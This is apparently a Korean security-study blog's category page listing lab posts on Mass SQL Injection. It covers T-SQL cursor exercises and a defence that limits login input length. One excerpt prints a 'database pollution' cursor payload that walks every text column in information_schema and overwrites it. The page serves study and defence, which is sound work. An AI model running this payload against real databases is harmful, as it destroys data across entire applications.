| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 | 29 |
| 30 |
- csrf
- DHCP
- VPN
- 보안 솔루션
- web server
- WAF
- Web Authentication
- Vlan
- Linux
- Database Scheme
- sql injection
- Blind SQL Injection
- XSS
- UTM
- NETSEC
- VPC
- SQL
- docker
- arp
- GRE
- Web
- stored procedure
- Router Firewall
- wireshark
- HSRP
- IDS
- Mass SQL Injection
- AWS
- Websec
- snmp
- Today
- Total
목록Mass SQL Injection (5)
yuil :: SecOps
[WebSec] Mass SQL Injection 대응방안
win2kmember_login_check.aspIF Len(id)>15 or Len(password)>20 Then response.write "" response.write "" response.EndEND IF Mass SQL Injection 공격은 긴 쿼리를 입력하기 때문에 id 입력 문자열 길이를 제한하는 것으로 대응이 가능하다.
[WebSec] Mass SQL Injection 실습 - Cursor 02
데이터베이스 오염 공격 실행 (커서 블록)select * from boarddeclare @t varchar(1000), @c varchar(1000)declare cur cursor for select table_name, column_name from information_schema.columnswhere data_type like '%varchar%' or data_type like '%text%'open curfetch next from cur into @t, @cwhile @@fetch_status = 0 begin exec('update '+@t+' set '+@c+'=''''') fetch next from cur into @t, @c endclose curdeallocate curse..
[WebSec] Mass SQL Injection 실습 - Cursor 01
커서 생성declare cur cursor for select user_id, user_pw from memberopen curfetch next from curclose curdeallocate curdeclare cur cursor for select user_id, user_pw from memberopen curfetch next from curfetch next from curclose curdeallocate cur declare cur cursor for select user_id, user_pw from memberopen curfetch next from curwhile @@fetch_status = 0 begin fetch next from cur endclose curdealloca..
[WebSec] Mass SQL Injection 실습
win2k쿼리 분석기# 현재 날짜, 시간 정보select getdate()# 특정 정보만 출력# dw : 요일select datepart(dw,getdate())# yy : 연도select datepart(yy,getdate())# mm, dd, hhselect datepart(mm,getdate())select datepart(dd,getdate())select datepart(hh,getdate())if datepart(dw,getdate())=7 or datepart(dw,getdate())=1 begin print 'weekend' endelse begin print 'weekday' end 변수 선언 및 조건문 사용declare @counter intset @counter=21if @coun..
Mass SQL Injection*Mass : 대량 [WebSec] Mass SQL Injection 실습win2k쿼리 분석기# 현재 날짜, 시간 정보select getdate()# 특정 정보만 출력# dw : 요일select datepart(dw,getdate())# yy : 연도select datepart(yy,getdate())# mm, dd, hhselect datepart(mm,getdate())select datepart(dd,getdate())select datyu-il.tistory.com Mass SQL Injection Query 예제-- Table_name, Column_name 을 위한 변수선언declare @t varchar(1000), @c varchar(1000)-- Curso..